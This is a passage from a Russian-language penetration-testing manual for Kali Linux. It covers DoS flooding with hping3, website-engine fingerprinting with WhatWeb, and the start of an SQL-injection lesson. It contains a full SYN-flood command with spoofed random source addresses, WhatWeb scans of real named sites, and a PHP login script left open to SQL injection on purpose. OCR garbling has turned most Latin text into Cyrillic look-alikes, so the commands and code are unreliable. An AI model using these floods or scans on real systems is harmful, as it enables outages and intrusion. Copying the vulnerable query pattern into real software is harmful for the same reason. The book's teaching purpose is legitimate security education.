необходимо учитывать интересы третьих лиц. Этими третьими лицами могут быть 
владельцы хостинга (если вы тестируете чужой сайт, виртуальный сервер, находящиеся 
на хостинге), интернет-провайдеры (поскольку значительный поток трафика может 
создавать нагрузку на их коммуникации) и т. д. Крайне желательно согласовывать 
стресс-тесты и с этими третьими лицами во избежание всех возможных проблем. 
Иначе, невольно, вы станете причинителем вреда тем, на кого стресс-тест не был 
нацелен. 

Нріп§3 хорошо отрабатывает если у вас ещё есть другие запущенные ОоЗ инструменты 
вроде (ЗоІсІепЕѵе (использование нескольких инструментов, которые атакую один и тот 
же сайт/сервер/услугу, увеличивает шансы на успех). Знаете ли вы, что есть агентства и 
корпорации, которые практически в реальном времени отслеживают ОйоЗ атаки по 
всему миру и отображают карту ОоЗ в реальном времени: 

• НіТрі/Амщум.сІіщіаІаІТасктар.сот/ 

• Ьі:1:р://тар.пог5есогр.сот/ 

• Ні:1:р://тар.ірѵікіпй.сот/ 

Сегодня мы будем использовать для нашей атаки отказа-в-обслуживании — ЭоЗ — 
бріп§3 

В этой инструкции будет продемонстрировано, как досить используя Нріп§3 со 
случайными ІР источника на Каіі Ыпих. 

Перед тем, как мы начнём использовать Ьріп§3, давайте пройдёмся по основам. 

Что такое ИріпеЗ 

Ьріп§3 это бесплатный генератор пакетов и анализатор для ТСР/ІР протокола. Нріп§, де 
факто, один из обязательных инструментов для аудита безопасности и тестирования 
файерволов и сетей, он использовался для выполнения эксплойта техники 
сканирования ІсІІе 5сап, которая сейчас реализована в сканере портов ІМтар. Новая 
версия Нріп§ — Нріп§3 — написана на скриптах с использованием языка ТсІ. В 
ней реализует сядвижок для удобного описания строками ТСР/ІР пакетов, 
следовательно, программист может за очень короткое время написать скрипт, 
относящийся к низкоуровневой манипуляции пакетами ТСР/ІР и анализировать их. 
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Как и большинство инструментов, использующихся в компьютерной безопасности, 
Нріп§3 полезен для экспертов по безопасности, но существует множество приложений, 
связанных с тестированием сети и системным администрированием. 

бріп§3 следует использовать для... 

• Тгасегои1:е/ріп§/ргоЬе (трассировки/пинга/зондирования) хостов за 
файерволом, которые блокируют попытки использовать стандартные утилиты. 

• Выполнения сканирования простоя (в настоящее время реализуется в птар с 
лёгким пользовательским интерфейсом). 

• Тестирование правил файервола. 

• Тестирование Ю5 (систем обнаружения вторжения). 

• Эксплуатации известных зависимостей в стеках ТСР/ІР. 

• Сетевых исследованиях 

• Изучении ТСР/ІР (Нріп§ была использована в сетевых курсах АРАІК). 

• Написании реальных приложений, связанных с ТСР/ІР тестированием и 
безопасностью. 

• При автоматизированных тестах по фильтрации трафика. 

• Создания рабочей модели эксплойтов. 

• Исследований в свере сетей и безопасности, когда нужно эмулировать 
комплексное ТСР/ІР поведение. 

• Прототипах систем обнаружения вторжения (Ю5) 

• Простых в использовании утилитах с интерфейсом Тк. 

бріп§3 уже установлен в Каіі Ыпих как и многие другие инструменты. Он крайне 
полезен и уже скоро я продемонстрирую его работу. 

йо5 с использованием Нріп§3 и случайным ІР источника 

Ну хватит уже ходить вокруг да около, переходим к атаке. Запускается всё одной 
простой командой: 


1| 

гоо1:(а)Ѵ\/еЬѴ\/аге-КаІІ:~# Нріп§3 -с 10000 -сі 120 -5 -ѵѵ 64 -р 21 -ЛоосІ --гапсі-зоигсе 
192.168.1.37 

21 

НРІІЧ6 192.168.1.37 (еіЬО 192.168.1.37): 5 зеі, 40 Кеасіегз + 120 ёаіа Ьуіез 

3| 

Нріп§ іп ЛоосІ тосіе, по герііез ѵѵіІІ Ье зііоѵѵп 

4| 

Л С 

51 

— 192.168.1.37 Нріп§ зіабзбс — 

6| 

3258138 раскеіз ІгапзтіІДес), 0 раскеіз гесеіѵесі, 100% раскеі Іозз 

71 

гоипсі-ігір тіп/аѵ§/тах = 0.0/0.0/0.0 тз 

81 

го 01 @ \А/е Ь \Л/а ге-Ка 1 і: ~# 


Давайте разберёмся в синтаксисе используемой команды: 
Иріп§3 = Имя бинарника приложения. 

-с 100000 = Количество пакетов для отправки. 
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-сі 120 = Размер каждого пакета, который будет отправлен на целевую машину. 

-5 = Я отправляю только пакеты 5ѴІ\І. 

-ѵѵ 64 = Размер окна ТСР. 

-р 21 = Порт назначения (используется 21 порт РТР). Вы можете использовать здесь 
любой порт. 

— ТІоосІ = Отправка пакетов так быстро, как возможно, не заботясь об отображении 
входящих пакетов. Решим флуда. 

— гапсі-воигсе = Использование рандомных ІР адресов источника. Вы также можете 
использовать -а или -зрооі чтобы спрятать имя хоста. Подробности по тап Нріп§3 

192.168.1.37 = Целевой ІР адрес или ІР адрес целевой машины. Также вы можете 
использовать здесь сайт. В моём случае, тестирование происходит в лабораторных 
условиях, в пределах локальной сети. 

Так как узнать, работает ли это? В режиме флуда Ьріп§3 не проверяет полученные 
ответы (в любом случае мы не могли бы это сделать, поскольку мы использовали флаг 
-гапсі-зоіісе, означающий, что ІР адрес источника больше не ваш). 

Посмотрим на ситуацию со стороны сервера. Я буду использовать команду іор. Так 
выглядит ситуацию на сервере в режиме простоя: 


С 


Тор - 11:55:19 ир 3 тіп, 1 игег, Іоасі аѵегаде: 0,04, 0, 
Тагкг: 80 ТоТа! , 1 гиппіпд, 79 гіееріпд, 0 гТорреЩ 

ЭйСри(з): 0,3 иг, 0,0 гу, 0,0 пі, 99,7 іЗ, 0,0 «а, 0, 

КіВ Мет: 1012156 ТоТа1, 196532 игесі, 815624 Тгее, 

КіВ 5«ар: 2068476 ТоТаЧ , 0 изесі, 2068476 Тгее. 

10, 0,05 

0 готЬі е 

0 Ні , 0,0 гі , 0,0 гТ 

95 76 ЬиТТегг 

885 92 сасЬес! Мет 

| РЮ 

ІІ5ЕК 

РК 

N1 

VI КТ 

КЕ5 

5НК 

В 

Э6СРІІ 

ЭИ ЕМ 

ТІМЕ+ СОММАІ® 

1 

ГООТ 

20 

0 

28576 

4612 

3080 

5 

0,0 

0,5 

0:00.38 гугтета 

2 

гооТ 

20 

0 

0 

0 

0 

5 

0,0 

0,0 

0:00.00 кТНгеасісі 

3 

ГООТ 

20 

0 

0 

0 

0 

5 

0,0 

0,0 

0:00.01 кгоТТі гц<і/0 

4 

гооТ 

20 

0 

0 

0 

0 

5 

0,0 

0,0 

0:00.00 кмогкег/0:0 

5 

гооТ 

0 

-20 

0 

0 

0 

5 

0,0 

0,0 

0:00.00 кѵѵогкег/0:0Н 

6 

ГООТ 

20 

0 

0 

0 

0 

5 

0,0 

0,0 

0:00.00 Ыогкег/и2:0 

7 

гооТ 

20 

0 

0 

0 

0 

5 

0,0 

0,0 

0:00.28 гси_5сИесІ 

8 

гооТ 

20 

0 

0 

0 

0 

5 

0,0 

0,0 

0 : 00.00 гси_ЬИ 

9 

гооТ 

гТ 

0 

0 

0 

0 

5 

0,0 

0,0 

0:00.00 тідгаТіоп/О 

10 

гооТ 

гТ 

0 

0 

0 

0 

5 

0,0 

0,0 

0:00.00 ѵѵаТсМод/О 

11 

гооТ 

0 

-20 

0 

0 

0 

5 

0,0 

0,0 

0:00.00 кЬеІрег 

12 

гооТ 

20 

0 

0 

0 

0 

5 

0,0 

0,0 

0:00.00 ксІеѵГтрТг 

_ 12 . 

гооТ 

_ 

щіН 

0 

_ 0 _ 

_ 0_ 

_ 2 _ 

0.0 

0.0 



Использование процессора в районе нуля, много свободной оперативной памяти. 
Так сервер себя чувствует после начала атаки: 


С 


Тор - 11:57:50 ир 5 тіп, 1 игег, Іоасі аѵегаде: 1,42, 0,72, 0,29 
Тазкг: 76 ТоТаЧ , 2 гиппіпд, 74 гіееріпд, 0 гТоррегі, 0 готЬіе 

%Сри(г): 0,0 из, 0,3 гу, 0,0 пі , 4,5 іЗ, 0,0 «а, 0,0 Ні , 95,2 5І , 0,0 5Т 
КІВ Мет: 1012156 ТоТаІ , 196468 изеЗ, 815688 Тгее, 9584 ЬиТТегз 

КіВ Вѵѵар: 2068476 ТоТаІ, 0 игесі, 2068476 Тгее. 88592 сасНес! Мет 


| РЮ 

ІІ5ЕК 

РК 

N1 

ѴІКТ 

КЕ5 

5НК 

В 

9ЙСР1І 

ЭИ ЕМ 

ТІМЕ+ СОММАМО 

3 

гоог 

20 

0 

0 

0 

0 

к 

52,0 

0,0 

0:50.90 кготтт гда/0 

857 туза! 

20 

0 

492604 

47648 

10576 

5 

35,0 

4,7 

0:29.05 птугдісі 

1154 

гооТ 

20 

0 

23680 

2936 

2416 

К 

4,5 

0,3 

0:02.83 Тор 

645 

гооТ 

20 

0 

280588 

24300 

18084 

5 

1,2 

2,4 

0:01.35 арасНе2 

411 

ГООТ 

20 

0 

37068 

2756 

2324 

5 

0,9 

0,3 

0:00.07 грсЬіпсІ 

1155 

гооТ 

20 

0 

0 

0 

0 

5 

0,9 

0,0 

0:00.53 к\ѵогкег/0:0 

7 

ГООІ 

20 

0 

0 

0 

0 

5 

0,6 

0,0 

0:01.96 гси_5сНесІ 

1146 

гооТ 

20 

0 

82700 

5968 

5120 

5 

0,3 

0,6 

0:02.25 55На 

1 

гооТ 

20 

0 

28576 

4612 

3080 

5 

0,0 

0,5 

0:00.47 гугТетсі 

2 

гооТ 

20 

0 

0 

0 

0 

5 

0,0 

0,0 

0:00.00 кТНгеааа 

5 

гооТ 

0 

-20 

0 

0 

0 

5 

0,0 

0,0 

0:00.00 Ыогкег/0:0Н 

6 

гооТ 

20 

0 

0 

0 

0 

5 

0,0 

0,0 

0:00.00 к\ѵогкег/и2 :0 

8 

гооТ 

20 

0 

0 

0 

0 

5 

0,0 

0,0 

0:00.00 геи ЬН 

9 

гооТ 

Г* 

0 

0 

0 

0 

5 

0,0 

0,0 

0:00.00 тідгаТіоп/О 

10 

ГООТ 

гТ 

0 

0 

0 

0 

5 

0,0 

0,0 

0:00.28 ѵѵаТсНсіод/О 

11 

гооТ 

0 

-20 

0 

0 

0 

5 

0,0 

0,0 

0:00.00 кНеІрег 

12 

гооТ 

20 

0 

0 

0 

0 

5 

0,0 

0,0 

0:00.00 ЫеѵГтрТз 
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Эта атака не оказала влияния на оперативную памяти, но полностью поглотила ресурсы 
процессора. 

Чтобы понять, что это за $і, обратимся к Википедии : 

и$ — (ІІзег СРІІ Ііггіе) время, затраченное на работу программ пользователей 

$у — (5у$1:ет СРІІ Ііте) время, затраченное на работу процессов ядра 

пі — (ІЧісе СРІІ Ііте) время, затраченное на работу программ с измененным 
приоритетом 

ісі — простой процессора 

ѵѵа — (іоѵѵаіі:) время, затраченное на завершение ввода-вывода 

Ы — (Нагсіѵѵаге ІВЦ) время, затраченное на обработку Ьагсіѵѵаге-прерываний 

$і — (ЗоДѵѵаге Іпіеггиріз) время, затраченное на работу обработку зоДѵѵаге-прерываний 
(пеіѵѵогк) 

$1 — (ЗТеа I Тіте) время, «украденное» гипервизором у этой виртуальной машины для 
других задач (например работа другой виртуальной машины) 

Т.е. $і — (ЗоДѵѵаге Іпіеггиріз) время, затраченное на работу обработку зоДѵѵаге- 
прерываний (пеіѵѵогк). Вполне логично. 

Заключение 

Любые новые и современные файерволы будут блокировать это, и в наши дни 
большинство ядер Ыпих построены с защитой от 5ѴЫ флуда. Эта инструкция 
предназначена для целей исследования и обучения. Для тех, у кого проблемы с ТСР 
5ѴЫ или ТСР Соппесі флудом, попробуйте изучить ІРТаЫез и способы настройки для 
блокировки 0о5-атак, использующих Ьріп§3 или любые другие инструменты. Вы также 
можете осуществлять ЭоЗ-атаку с использованием ОоІсІепЕуе и другие инструменты 
для стресс-теста сети . 


Часть 5. Анализ уязвимостей в веб-приложениях 

Глава 33. Инструкция по ѴѴНаІѴѴеЬ: как узнать движок сайта в 
Каіі Ыпих 

Как с помощью ѴУИаШеЬ узнать версию движка сайта 

Информация о движке и его версии очень важна при тестировании веб-приложений на 
проникновение. В первую очередь, эта информация будет использована для поиска 
эксплойтов и известных уязвимостей именно для этого движка этой версии. Это на 
порядок облегчает взломщику задачу. Именно поэтому многие популярные движки 
перестали публиковать свою версию рядом с надписью Роѵѵегеб Ьу. Тем не менее, 
скрыть используемый движок и его версию очень непросто. Есть сканеры, которые 
делают это автоматически и в пакетном режиме. 

Чтобы узнать движок сайта и его версию используется программа ѴѴИаіѴѴеЬ. 

Например, есть некий форум, на нём даже нет надписи Роѵѵегеб Ьу (скорее всего, это 
запрещено лицензией, но некоторые веб-мастера готовы идти и на нарушение 
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лицензии — лишь бы скрыть движок и его версию). Чтобы узнать информацию о нём я 
набираю: 


1 


ѵѵІіаіѵѵеЬ ЬіірУ/ѵѵѵѵѵѵІ.ЬиСги/Гогит/ 


Где ѵѵНаіѵѵеЬ — имя программы. 


а ИіІр://ѵѵѵѵѵѵ1.Ііи1.гиДогит/ — адрес интересующего нас сайта 

гоо*(д)\Л/еЬѴѴаге-КаІі: ~ 

Файл Правка Вид Поиск Терминал Справка 


:~# ѵѵЬаШеЬ Ыір://ѵл\лді1 .Ьиі . ги/іогит/ 

/изгЛіЬ/гиЬу/1 .9. 1/гиЬудетз/сизіот_гедиіге . гЬ :36 :іп 'гедиіге': ісопѵ \л»і11 Ье сіергесаіесі іп ІЬе 
Іиіиге, изе 51: гіпд#епсосІѳ іпзіеасі. 

Ьіір://мммі. Ни! . ги/Тогит/ [200] Соокіе5[рПрЬЬ2тузд1_сІаіа, рПрЬЬ2тузд1_зі(1] , Соипігу [ГШ55ІАН РЕОЕК 
АТІОМ] [КО] , ЕтаіІ[ --Каііпд@МаіІ. ги] , СоодІе-А(і$еп5е[риЬ-2725632885221078], НТТР5егѵег[пдіпх/0.6. 
29], ІР[ 89 . 108.91.171] , РНР[4.3.9], РаззмогсІРіеІсЦраззыогсІ] , РомегесіВу[рПрВВ] , $сгірі[іехІ/іаѵаз 
сгірі], ТіПе[НТТР %Э1%С0%С8%04%04%С5%0Ѳ%0В - ѴЛлЛ.Ниі.ги :: %СЗ%ЕВ%ЕѲ%Е2%ЕО%Е0%РР], Х-Ромегесі-В 
у [РНР/4.3.9], пдіпх[0.6.29] , рНрВВ[2] 
гоо і:(с]ЫеІ)Каге-КаІі:-# | 


■од 


Информации много, в том числе и требуемая нам: 


1| 

РоѵѵегесІ Ву[рГірВВ] 

2 1 

рНрВВ[2] 


Т.е. форум работает на движке рНрВВ второй версии. 

Кроме этого, мы узнаём версию РНР, веб-сервера, ІР адрес и страну расположения, 
используемые веб-технологии и даже информацию о логине в Соо§1е АсІЗепзе. 
Согласитесь, начало хорошее. 


Возьмём другой пример: 


1 


ѵѵКаіѵѵеЬ ѵѵеЬѵѵаге.Ьіг 


гоо*(д)\Л/еЬѵѵаге-Каи: 

Файл Правка Вид Поиск Терминал Справка 


:~# ѵѵЬаіѵѵеЬ ѵѵеЬма ге. Ьіг 

/изг/1іЬ/гиЬу/1 .9. 1/гиЬудетз/сиз1от_гедиіге . гЬ:36:іп 'гедиіге': ісопѵ ѵѵіТТ Ье сіергесаіесі іп ІЬе 
Тиіиге, изе 51 гіпд#ѳпсосІе іпзіеасі. 

Н11р: //меЬмаге. Ьіг [200] Соокіез[иаззир], Соипігу [ЕІШОРЕАН ІШОИ] [ЕІІ] , ЕтаіІ[Каііпд@НаіІ. ги] , НТ 
МІ_5, НТТР5егѵег[пдіпх/1. 6.3], ІР[ 185.26.122.50] , ЗОиегу [ 1 . 11.2] , НеіаСепегаіог [МогсІРгезз 4.2.2], 
Мосіегпігг, РНР[5.6.4], 5сгір1[ Заѵа5сгірі, заѵазсгірі>,Іехі/іаѵазсгірі] , ТііІе[ і-эЬѴи'аге.Ьіг | 

92%01%81%РѲ%В5 Ѵ№Ь-%О1%82%О0%В5%О1%85%О0%ВО%ОѲ%ВЕ%О0%ВВ%ОѲ%ВЕ%О0%ВЗ%ОѲ%В8%О0%В8 %РѲ%В0%0Ѳ%ВѲ %О0 
%ВЕ%О0%В4%О0%ВО%О0%ВЕ%О0%ВС %О0%ВР%О0%ВЕ%О1%80%О1%82%О0%В0%О0%ВВ%О0%В5], 1)псотиопНеа<іег5[х-ріпдЬ 
аск], Мог8Ргез5[4. 2. 2] , Х-РомегесІ-Ву [РНР/5.6.4] , Х-ІІА-Сотра1іЫе[ІЕ=есіде] , пдіпх[ 1.6.3] , х-ріпдЬ 
аск [ Ыір: //меЬмаге . Ьіг/хті грс . рЬр] 

г о о іі аѵ.'еЬМаге-КаІі : —# | 


Опять, информации много и она достоверна. 
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В справке программы ѴѴЬаТѴѴеЬ упоминается про агрессивный режим — для 
определения точной версии ѴѴогсІРгезз, запускается он так: 


1| 

ѵѵІтаІѵѵеЬ -а 3 ѵѵеЬѵѵаге.Ьіі 

Можно проверять по нескольку сайтов за один раз: 

11 

ѵѵЬаІѵѵеЬ ѵѵеЬѵѵаге.Ьіі іаііпих.ги ті-аі.ги 


гоо*(§)ѴУеЬѴѴаге-КаІі: ~ 

Файл Правка Вид Поиск Терминал Справка 



(л/ЬаТмѳЬ ѵѵеЬѵѵаге.Ьіг гаТіпих.ги ші-аі.ги 


/изг/Т.іЬ/гиЬу/1.9.1/гиЬудетз/сиз1:от_гедиігѳ. гЬ :36 :іп 'гедиіге': ісопѵ міТЛ. Ьѳ сІѳргесаТесІ іп іЬе 
ГиТиге, изе 51: гіпд#ѳпсосІе іпзіеасі. 

НТТр: //ші-аі. ги [200] СоипТгу [ЕІЖОРЕАН иМІОЫ] [ ЕЦ] , ЕтаіІ[Ка1:іпд@НаіІ. ги, аІ@гаі-аІ. ги] , НТМЬ5, НТТ 
Р5егѵег[пдіпх/1. 6.3] , ІР[ 185 . 26 . 122.50] , РНР[5.6.4], $сгірі:[1:ех1:/]аѵа5сгір1:] , ТіТІе[ ! 

%О0%ВѲ%О0%В2%О0%ВО%О0%В0%О1%8Р %О1%81%О1%82%О1%8Ѳ%О0%В0%О0%ВО%О0%В8%О1%86%О0%В0], Х-РомегесІ-Ву[Р 
НР/5.6.4] , пдіпх[1.6.3] 

ИТТр: //меЬиаге. Ыг [200] Соокіез[маззир], СоипТгу [ЕІІКОРЕАИ ІШОМ] [ЕІІ] , ЕтаіІ[Ка1:іпд@Наі1. ги] , НТ 
МЕ5, НТТР5егѵег[пдіпх/1. 6 . 3] , ІР[ 185.26.122.50] , Юиегу [ 1.11.2] , МеІаСепегаТогІМогсІРгезз 4.2.2], 
Мосіегпігг, РНР[5.6.4], 5сгірТ[ ЗаѵаЗсгірІ:,іаѵазсгірО,ТехТ/заѵазсгірІ:] , Т1Ие[ эЬѵаге.Ьі: 

92%01%81%РѲ%В5 ѵі/ѳЬ 1%82%О0%В5%0 1%85%О0%ВО%О0%ВЕ%О0%ВВ%О0%ВЕ%О0%ВЗ%О0%В8%О0%В8 %О0%ВО%О0%В0 %Р0 
%ВЕ%О0%В4%О0%ВО%О0%ВЕ%О0%ВС %ОѲ%ВР%О0%ВЕ%О1%8О%О1%82%О0%ВО%О0%ВВ%О0%В5], ЦпсоштопНеа(1ег5[х-ріпдЬ 
аск] , ИогНРгезз[4. 2.2] , Х-Роѵѵегес)-Ву[РНР/5.6.4] , Х-ІМ-Сотра1:іЫе[ІЕ=есІде], пдіпх[1.6.3], х-ріпдЬ 
аск [ЫТр: //меЬмаге , Ьіг/хтігрс . рЬр] 

И«р:// 2 аІіпих.ги [200] Соокіез[иа5зир], СоипТгу [ЕІШОРЕАН иніОЫ] [ЕЫ], НТНЕ5, НТТР5егѵег[пдіпх/1. 
6.3], ІР[ 185.26.122.38] , ЗЦиегу[ 1.11.2] , НеТаСепега1:ог[Ногс)Рге55 4.2.2], РНР[5.3.29], 5сгірТ[іаѵ 
азсгірО, ТехТ/іаѵазсгірІ:] , Ті1:1е[2а1.іпих. ги | %Р0%9С%О1%8В 2аІ_іпих: %О0%В8%О0%ВО%О1%81%О1%82%О1% 
8'?'%01%8 ,; оР 1 %86%[ 1 0%В8%РѲ%В8, %01%81%! • ■ ЗЕ' : ьВ:'Ѵ • "і 1ѴЗ, : • ВЕ8: ПОПВЗ 

%О0%В6%О0%В4%00%В5%Э0%ВР%00%В8%Р0%В5 %0Ѳ%В0%0Ѳ%ВЕ%0Ѳ%В2%0Ѳ%ВЕ%01%81%01%82%0Ѳ%В5%0Ѳ%В9 %О0%В8 %й1 
%80%О0%В5%О1%88%О0%В5%О0%ВО%О0%В8%О0%В5 %О0%ВР%О1%8Ѳ%О0%ВЕ%О0%В1%О0%ВВ%О0%В5%О0%ВС], ШісоішпопНеа 
сіег5[х-ріпдЬаск] , Мог8Ргезз[ 4.2. 2] , Х-РомегеН-Ву [РНР/5.3.29] , пдіпх[ 1.6. 3] , х-ріпдЬаск [ИТТр : //га 
Ііпих.ги/хтІгрс.рНр] 
гооЦЖеВКаге-І ' :~# | 


Не смотря на свою кажущуюся простоту, справка ѴѴІтаіѴѴеЬ довольно обширна. 


Программу можно запускать не только в отношении сайта, но и в отношении подсетей 
(синтаксис указания диапазонов сетей такой же как и у ІМтар): 


1 


ѵѵНаТѵѵеЬ 185.26.122.0/24 


Опции программы ѴѴІіаШеЬ 


Рассмотрим самые интересные опции. 

— іприІ-КІе=ФАЙЛ, -і Идентифицировать ІІВЬ, которые найдены в ФАЙЛе, например -і 
/сіеѵ/зісііп 


Думаю, вы уже догадались что эта опция в таком виде позволяет передавать в 
ѴѴНаШеЬ адреса сайтов по трубе: 


1 


есНо ’ѵѵеЬѵѵаге.Ьіі' | ѵѵНаІѵѵеЬ -і /сіеѵ/зісііп 


Это мегополезно при написании скриптов. 

— а§§ге55Іоп, -а=УРОВЕНЬ 
УРОВЕНЬ задаётся числами 1, 3 или 4. 

1 — сканировать незаметно, 3 — сканировать агрессивно, 4 — сканировать тяжело, 
будут отправлены запросы от всех плагинов. 
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— и$ег-а§епІ, -ІІ=АГЕНТ По умолчанию пользовательский агент — \Л/Гіа1:\Л/еЬ/0.4.8-сІеѵ. 
Этой опцией его можно заменить 

— Неасіег, -Н Добавить заголовок НИР. например "Роо:Ваг". Если задан здесь, то 
заголовок по умолчанию будет заменён. Если задать пустую величину, например, 
"ІІ$ег-А§еп1::", то заголовок будет удалён. 

— ^оІІоѵѵ-гес1ігесІ=КОГДА Контролирует когда следовать редиректом. КОГДА может 
иметь значения 'пеѵег', 'ННр-опІу 1 , 'теіа-опіу 1 , 'зате-зііе 1 , 'зате-сіотаіп 1 или 'аіѵѵауз 1 . 
По умолчанию: аіѵѵауз 

— тах-гесКгес1$=ЧИСЛО Максимальное ЧИСЛО редиректов. По умолчанию: 10 
В ѴѴГіаШеЬ поддерживается базовая авторизация: 

—и$ег, -и=<и$ег:ра55ѵѵогс1> 

Добавьте сессионные кукиз — Ріеабег, например, — Ріеабег "Соокіе: 5Е55Ю=1а2ЬЗс;" 
Можно использовать прокси с ѴѴГіаШеЬ: 

—ргоху <Ио5Іпате[:рогІ]> Задать хост и порт прокси. Порт по умолчанию: 8080 

—ргоху-изег <и5егпате:ра$$ѵѵогсІ> Задать пользователя и пароль прокси 

ѴѴИаТѴѴеЬ поддерживает разнообразные способы сохранения полученных данных, а 
также позволяет менять настройки производительности/стабильности: число 
одновременных потоков, таймауты, время перерывов и т. д. 


Как узнать точную версию движка 

Узнав используемый тип движка, можно скачать его исходные коды (доступны для всех 
бесплатных) и поискать там разнообразные файлы КЕАОМЕ.ТХТ, чейнджлоги и т. п. 
Практически никто не беспокоится о том, чтобы удалить эти файлы. Поэтому теперь, 
когда вы знаете, что нужно искать, можно попробовать их найти на целевом сайте. 

Как скрыть движок сайта и его версию 


Скрыть вид используемого движка очень непросто. Зачастую не нужно быть 
специалистом и не нужно иметь никаких программ, чтобы по первому взгляду на сайт 
предположить используемый движок, иногда достаточно увидеть адрес одной 
страницы, чтобы предположить, какой движок сайт использует. Вот типичный 
пример: на "морде" сайта вырезаны все упоминания об используемом движке, но 
взглянув на исходный код НТМІ_-страницы, догадайтесь с трёх раз, какой движок 
используется: 


2 

3 

4 

5 
Ѳ 

7 

8 
0 
10 
11 
12 

13 

14 

15 
10 

17 

18 


< ІООСТѴРЕ Ыш1> 

<Неасі іТешзсоре і*ет1уре="Ы*р://5сЬета.ог§/иіРНеагіег" рге"Еіх="агбіс1е : НТТр: //о§р.те/п5/агбіс1е#"> 

<теТа сНаг5е*="и*^-8 и /> 

<теТа пате="ѵіемрогТ и сопТепТ= и іпіТіа1-5са1е=1, тахітит-5са1е=1” /> 

<! - - [і'Г ІЕ]><5сгір* 5гс="ИТ1:р: //ИТтІ55Ніѵ.§оо§1есо(іе.сот/5ѵп/Тгипк/ЬТтІБ.]5*'></5сгір1><! [епсіі-Е]--> 

<1іпк геІѴ’зНогТси* ісоп” Нге~Е=" /'Гаѵісоп . ісо " буре="іта§е/х-ісоп И > 

<1іпк ге1="арр1е-^оисЬ-ісоп" 5І2е5="76х76" Ьге~Р=" /ѵѵр-сопТеп^/ТЬете5/та5а1кп/ісопз/арріе-ТоисИ-ісоп-76x76.рп^ "> 
<1іпк геІѴ'аррІе-іоисН-ісоп" 5Іге5=''120х120" Ьге1 : =" А < р-сопСеп<Ѵ1:Ьепіеа/тааа1кп/ісоп;;/арр1е-«:оисЬ-ісоп-120х120.рпі; "> 
<1іпк ге1="арр1е-^оисЬ-ісоп И 5І2е5="152х152" Иге~Г=" Лѵр-согѵСепТ/^Неше5/та5а1кп/ісоп5/аррІе-^оисН-ісоп-152x152.рп% "> 
<Нпк ге1="арр1е-ЮисЬ-ісоп" 5І2е5="180х180" Ьга< : =" Аѵр-согИ:еп1:/1:Ьаше5/іпа5а1кп/ісоп5/арр1е-':оисЬ-ісоп-180х180.рпг "> 

<ііі1е>Новый дизайн, новый блог, новая жизнь!</*іТІе> 

<!-- ТНІ5 5І*е із орТітііегі міТЬ іИе ѴоазТ 5ЕО ріи§іп ѵ2.3.2 - К*‘1р5://уоа5*.сотЛѵогс1рге55/р1и§іп5/5ео/ --> 

<1іпк ге1= м сапопісаі" Ьге-^' ЧтЕірз : //тазаікіп. пате/поѵѵ-і-сІігатп-поѵѵ-і-Ыо^-поѵаѵа-гНігп/ " /> 
стеіа ргорег*у="о§: Іосаіе" соп*еп*= и ги_К1Г /> 

<теіа огооег*ѵ="ое:'Ьѵое" соп1еп1=“агТіс1е" /> 


Даже если полностью изменено оформление, убраны копирайты и прочее, то по 
структуре файлов сайта и по некоторым другим признакам довольно легко определить 
популярные движки. 
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Продуктивнее не пытаться спрятать эту информацию, а вовремя обновлять 
программное обеспечение и плагины. 

Что касается точной версии, то её можно скрыть. Удаляйте не используемые файлы 
(ВЕДОМ Е.ТХТ, чейнджлоги и т. п.). Например, для ѴѴогсІРгезз удаляйте эти файлы не 
только из корневой директории, но и из директорий плагинов, тем и т.д. 


Глава 34. 5СЦ-инъекции: простое объяснение для начинающих 
(часть 1) 


Суть БЦЬинъекций 

Наверное, уже слышали шутку из Интернета: «Почему во всех уроках рисования одно и 
тоже: Например , урок по рисованию совы. Сначала полчаса долго в деталях рисуем 
глаз совы. А потом — раз — за пять минут — рисуем оставшуюся часть совы». 


Вот даже картинка по этому поводу есть: 



1. Р 


ис^ем 


К.руЖО ЧЧ.И 



2. Р 


исуем остаток, созы 


По 50.1,-инжектам материала море: статьи, книги, видеокурсы (платные и бесплатные). 
При этом не многие из них прибавляют понимания по этому вопросу. Особенно если 
вы новичок. Я хорошо помню свои ощущения: вот он кружок, вот он остаток совы... 


Цель этой заметки — н атя н ут ь глаз н а сову дать нормальное просто объяснение, что же 

такое 5<ЗІ.-инъекции, в чём заключается их суть, насколько и почему они опасны. 

Для опытов, у нас будет очень простой и уязвимый к 5Щ.-инъекции скрипт: 


1| 

сЮОСТѴРЕ Ы:тІ> 

21 

<Ы:тІ> 

3| 

<ІіеасІ> 

4| 

стеЩ сІіаг5е1:="ІЯР-8"> 

51 

<ббе><ДИ:1е> 

6| 

</Ігеасі> 

71 

<ЬосІу> 

81 

<Н2>Для доступа к Бобруйской районной библиотеке введите Ваши учётные 

данные:</б2> 
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91 

сРогт те1:ЬосІ="§е1:" асбоп="?"> 

101 

<р>Введите ваше имж/р> 

111 

сіприі: пате="пате" 1уре="1ех1"> 

121 

<р>Введите ваш пароль</р> 

131 

сіприі: пате="ра55\л/огсі" 1уре="1:ех1:">сЬг /> 

141 

сіприі 1уре="5иЬті1:"> 

151 

сДогт> 

161 

с?ріір 

171 

$тузрІІ = пеѵѵ тузрІіС'ІосаІЬозІ:", "гооі","сіЬ_ІіЬгагу"); 

181 

іР (ту$рІІ_соппесР_еггпо()) { 

191 

ргіпТТ("Не удалось подключиться: %5\п", ту$рІІ_соппесР_еггог()); 

201 

ехі!(); 

211 

} еізе { 

221 

$ту5рІІ->риегу("5ЕТ ЫАМЕ5 ІІТР8"); 

231 

$ту5рІІ->риегу("5ЕТ СНАВАСТЕВ БЕТ ІІТР8"); 

241 

$ту5рІІ->риегу("БЕТ сНагасРег_5еР_сІіепР = ІІТР8"); 

251 

$ту5рІІ->риегу("БЕТ сНагасРег_5еР_соппесРіоп = ЕІТР8"); 

261 

$ту5рІІ->риегу("БЕТ сіэагасТег_5е1:_ге5иІ1:5 = ІІТР8"); 

271 

} 

281 

$пате = РіІРег_іприР(ІІ\ІРІІТ_ОЕТ, 'пате'); 

291 

$ра55\л/огсІ = РіІРег_іприР(ІІ\ІРІІТ_ОЕТ, ’ра55\л/огсГ); 

301 

іР ($ге5иІР = $ту5рІІ->риегу("5ЕІ_ЕСТ * РВОМ 'тетЬегз' ѴѴНЕВЕ пате = '$пате' АІ\Ю 
рЭ55\Л/0 ГСІ = $ра55\Л/ОГСІ")) { 

311 

\л/ЫІе ($оЬі = $ге5иІ1->РеРсРі_оЬ)есР()) { 

321 

есРю "ср>сЬ>Ваше имя: с/Ь> $оЬі->патес/р> 

331 

ср>сЬ>Ваш статус:с/Ь> $оЬ)->$РаРи5с/р> 

341 

ср>сЬ>Доступные для Вас книги:с/Ь> $оЬі->Ьоок5с/р>сІіг />"; 

351 
